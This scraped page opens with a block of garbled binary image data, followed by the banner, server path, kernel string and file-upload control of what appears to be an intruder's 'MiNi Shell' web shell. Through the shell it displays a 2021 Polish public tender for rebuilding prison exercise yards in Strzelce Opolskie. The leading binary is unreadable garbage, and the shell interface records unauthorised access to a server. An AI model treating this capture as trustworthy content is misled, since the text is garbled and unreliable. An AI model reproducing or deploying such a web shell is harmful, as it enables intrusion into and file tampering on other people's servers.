JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210728/0012973001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00129730 z dnia 2021-07-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa placów spacerowych przy pawilonach A i B<br/>w Zakładzie Karnym nr 2 w Strzelcach Opolskich </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny nr 2 w Strzelcach Opolskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000320940</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Klonowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzelce Opolskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">77/462 11 55</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">77/461 35 41</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_2_strzelce_opolskie@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.sw.gov.pl/jednostka/zaklad-karny-nr-2-w-strzelcach-opolskich</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zakład Karny </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa placów spacerowych przy pawilonach A i B<br/>w Zakładzie Karnym nr 2 w Strzelcach Opolskich </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9fdbf247-ef91-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00129730</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zp.sw.gov.pl, www.miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej: miniPortalu – narzędzia przygotowanego przez<br/>Urząd Zamówień Publicznych, dostępnego pod adresem https://miniportal.uzp.gov.pl, ePUAPu<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej:zk_2_strzelce_opolskie@sw.gov lub<br/>rafal.kucma@sw.gov.pl<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”,<br/>3) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w regulaminie korzystania z systemu miniPortal oraz warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP),<br/>4) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB,<br/>5) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP;<br/>6) Zamawiający przekazuje na stronie prowadzonego postępowania tj. www.zp.sw.gov.pl - ID<br/>postępowania. Dane postępowanie można wyszukać również na liście wszystkich postępowań w<br/>miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Dyrektor Zakładu Karnego nr 2 w Strzelcach<br/>Opolskich, ul. Klonowa 3, 47-100 Strzelce Opolskie,<br/>2) inspektorem ochrony danych osobowych w Zakładzie Karnym Nr 2 w Strzelcach Opolskich jest mjr<br/>Krzysztof Szczygieł,<br/>tel. 77 462 44 76, email: Krzysztof.Szczygiel@sw.gov.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego na „Przebudowa placów<br/>spacerowych przy pawilonie A i B w Zakładzie Karnym nr 2 w Strzelcach Opolskich” -<br/>DKw.2232.6.2021.RK prowadzonym w trybie podstawowym, na podstawie art. 275 pkt. 1 ustawy z dnia<br/>11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019) zwanej dalej także „<br/>Pzp''. ;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. Pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKw.2232.6.2021.RK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa placu spacerowego przy pawilonie A w Zakładzie Karnym nr 2 w Strzelcach<br/>Opolskich </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które:<br/>a) zostaną złożone przez Wykonawców nie wykluczonych przez Zamawiającego z niniejszego<br/>postępowania,<br/>b) nie zostaną odrzucone przez Zamawiającego.<br/>2. Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie:<br/>a) KRYTERIUM nr 1 – Cena brutto (C) waga – 60 %<br/>W ramach tego kryterium Wykonawca może otrzymać maksymalnie 60 pkt.<br/>b) KRYTERIUM nr 2 – Okres gwarancji jakości oraz rękojmi(G) waga – 40 %<br/>W ramach tego kryterium Wykonawca może otrzymać maksymalnie 40 pkt.<br/>3. Sposób oceny ofert:<br/>Zamawiający, będzie oceniał oferty przyznając ofertom punkty z zastosowaniem następujących zasad i<br/>wzorów:<br/>3.1 Liczba punktów, które można uzyskać w kryterium „Cena” (C) – waga 60%, zostanie obliczona wg<br/>następującego wzoru:<br/>C = (C najniższa /C badana) x 60 %<br/>gdzie:<br/>C – ilość punktów badanej ceny brutto oferty,<br/>C najniższa – cena oferty najniższej spośród zaproponowanych w ofertach,<br/>C badana – cena oferty badanej,<br/>Porównywaną ceną, będzie cena brutto ogółem za realizację zamówienia obliczonej przez<br/>Wykonawcę, zgodnie z przepisami prawa i podanej w formularzu ofertowym (załącznik nr 4 do SWZ).<br/>Określona w ten sposób cena oferty służyć będzie wyłącznie do porównania ofert i wyboru<br/>najkorzystniejszej oferty.<br/>3.2 Liczba punktów, które można uzyskać w kryterium „Okres gwarancji jakości oraz rękojmi” (G) –<br/>waga 40 %, zostaną przyznane zgodnie z poniższym opisem:<br/>Oferty w tym kryterium, oceniane będą w odniesieniu do najdłuższego okresu gwarancji jakości i<br/>rękojmi na wykonane roboty budowlane oraz urządzenia, materiały zamontowane lub dostarczone w<br/>ramach realizacji przedmiotu zamówienia przedstawionego przez Wykonawców zastrzegając, iż<br/>minimalny okres (termin) gwarancji jakości oraz rękojmi wynosi 48 miesiące, wg poniższego wzoru:<br/>a) 48 miesięcy gwarancji jakości i rękojmi – 0 punktów<br/>c) 60 miesięcy gwarancji jakości i rękojmi – 20 punków<br/>d) 72 miesięcy gwarancji jakości i rękojmi – 40 punków<br/>Punkty zostaną przyznane na podstawie oświadczenia złożonego w formularzu ofertowym (załącznik<br/>nr 4 do SWZ). W przypadku nie podania przez Wykonawcę w w/w formularzu ofertowym okresu<br/>gwarancji jakości i rękojmi, podania innego okresu jak 60 lub 72 miesiące okresu gwarancji jakości i<br/>rękojmi Zamawiający do oceny oferty przyjmie minimalny okres (termin) gwarancji jakości i rękojmi tj.<br/>48 miesięcy.<br/>Oferta z okresem 72 miesięcy gwarancji jakości i rękojmi, otrzyma maksymalną ilość punktów.<br/>4. Zamawiający może przyznać Wykonawcy maksymalnie 100 punktów. Za ofertę najkorzystniejszą<br/>zostanie uznana oferta, niepodlegająca odrzuceniu, złożona przez niewykluczonego z postępowania<br/>Wykonawcę, która uzyska największą łączną ilość punktów w oparciu o podane kryteria oceny ofert,<br/>obliczoną wg następującego wzoru:<br/>Ł= C + G<br/>Ł – łączna liczba punktów jaką uzyskała oceniana oferta,<br/>C – liczba punktów przyznanych ocenianej ofercie w ramach kryterium „cena”,<br/>G – liczba punktów przyznanych ocenianej ofercie w ramach kryterium „okres gwarancji jakości i<br/>rękojmi”,<br/>5. Uzyskana z wyliczenia ilość punktów w każdym kryteriów zostanie ostatecznie wyliczona z<br/>dokładnością do drugiego miejsca po przecinku z zachowaniem następującej zasady: jeżeli parametr<br/>Ogłoszenie nr 2021/BZP 00106001/01 z dnia 2021-07-06<br/>2021-07-06 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>miejsca tysięcznego jest poniżej 5 to parametr setny zaokrągla się w dół, jeżeli parametr miejsca<br/>tysięcznego jest 5 i powyżej to parametr setny zaokrągla się w górę.<br/>6. Jeśli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybiera ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający<br/>wzywa Wykonawców, którzy złożyli te oferty, do złożenia dodatkowych w terminie</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości oraz rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa placu spacerowego przy pawilonie B w Zakładzie Karnym nr 2 w Strzelcach<br/>Opolskich </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-25 do 2021-12-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które:<br/>a) zostaną złożone przez Wykonawców nie wykluczonych przez Zamawiającego z niniejszego<br/>postępowania,<br/>b) nie zostaną odrzucone przez Zamawiającego.<br/>2. Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie:<br/>a) KRYTERIUM nr 1 – Cena brutto (C) waga – 60 %<br/>W ramach tego kryterium Wykonawca może otrzymać maksymalnie 60 pkt.<br/>b) KRYTERIUM nr 2 – Okres gwarancji jakości oraz rękojmi(G) waga – 40 %<br/>W ramach tego kryterium Wykonawca może otrzymać maksymalnie 40 pkt.<br/>3. Sposób oceny ofert:<br/>Zamawiający, będzie oceniał oferty przyznając ofertom punkty z zastosowaniem następujących zasad i<br/>wzorów:<br/>3.1 Liczba punktów, które można uzyskać w kryterium „Cena” (C) – waga 60%, zostanie obliczona wg<br/>następującego wzoru:<br/>C = (C najniższa /C badana) x 60 %<br/>gdzie:<br/>C – ilość punktów badanej ceny brutto oferty,<br/>C najniższa – cena oferty najniższej spośród zaproponowanych w ofertach,<br/>C badana – cena oferty badanej,<br/>Porównywaną ceną, będzie cena brutto ogółem za realizację zamówienia obliczonej przez<br/>Wykonawcę, zgodnie z przepisami prawa i podanej w formularzu ofertowym (załącznik nr 4 do SWZ).<br/>Określona w ten sposób cena oferty służyć będzie wyłącznie do porównania ofert i wyboru<br/>najkorzystniejszej oferty.<br/>3.2 Liczba punktów, które można uzyskać w kryterium „Okres gwarancji jakości oraz rękojmi” (G) –<br/>waga 40 %, zostaną przyznane zgodnie z poniższym opisem:<br/>Oferty w tym kryterium, oceniane będą w odniesieniu do najdłuższego okresu gwarancji jakości i<br/>rękojmi na wykonane roboty budowlane oraz urządzenia, materiały zamontowane lub dostarczone w<br/>ramach realizacji przedmiotu zamówienia przedstawionego przez Wykonawców zastrzegając, iż<br/>minimalny okres (termin) gwarancji jakości oraz rękojmi wynosi 48 miesiące, wg poniższego wzoru:<br/>a) 48 miesięcy gwarancji jakości i rękojmi – 0 punktów<br/>c) 60 miesięcy gwarancji jakości i rękojmi – 20 punków<br/>d) 72 miesięcy gwarancji jakości i rękojmi – 40 punków<br/>Punkty zostaną przyznane na podstawie oświadczenia złożonego w formularzu ofertowym (załącznik<br/>nr 4 do SWZ). W przypadku nie podania przez Wykonawcę w w/w formularzu ofertowym okresu<br/>gwarancji jakości i rękojmi, podania innego okresu jak 60 lub 72 miesiące okresu gwarancji jakości i<br/>rękojmi Zamawiający do oceny oferty przyjmie minimalny okres (termin) gwarancji jakości i rękojmi tj.<br/>48 miesięcy.<br/>Oferta z okresem 72 miesięcy gwarancji jakości i rękojmi, otrzyma maksymalną ilość punktów.<br/>4. Zamawiający może przyznać Wykonawcy maksymalnie 100 punktów. Za ofertę najkorzystniejszą<br/>zostanie uznana oferta, niepodlegająca odrzuceniu, złożona przez niewykluczonego z postępowania<br/>Wykonawcę, która uzyska największą łączną ilość punktów w oparciu o podane kryteria oceny ofert,<br/>obliczoną wg następującego wzoru:<br/>Ł= C + G<br/>Ł – łączna liczba punktów jaką uzyskała oceniana oferta,<br/>C – liczba punktów przyznanych ocenianej ofercie w ramach kryterium „cena”,<br/>G – liczba punktów przyznanych ocenianej ofercie w ramach kryterium „okres gwarancji jakości i<br/>rękojmi”,<br/>5. Uzyskana z wyliczenia ilość punktów w każdym kryteriów zostanie ostatecznie wyliczona z<br/>dokładnością do drugiego miejsca po przecinku z zachowaniem następującej zasady: jeżeli parametr<br/>Ogłoszenie nr 2021/BZP 00106001/01 z dnia 2021-07-06<br/>2021-07-06 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>miejsca tysięcznego jest poniżej 5 to parametr setny zaokrągla się w dół, jeżeli parametr miejsca<br/>tysięcznego jest 5 i powyżej to parametr setny zaokrągla się w górę.<br/>6. Jeśli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybiera ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający<br/>wzywa Wykonawców, którzy złożyli te oferty, do złożenia dodatkowych w terminie</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości oraz rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3) sytuacji ekonomicznej lub finansowej - zamawiający uzna, że wykonawca spełnia warunek w zakresie posiadania odpowiedniej zdolności ekonomicznej lub finansowej niezbędnej do realizacji zamówienia jeżeli:<br/>a) wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 500 000,00 zł 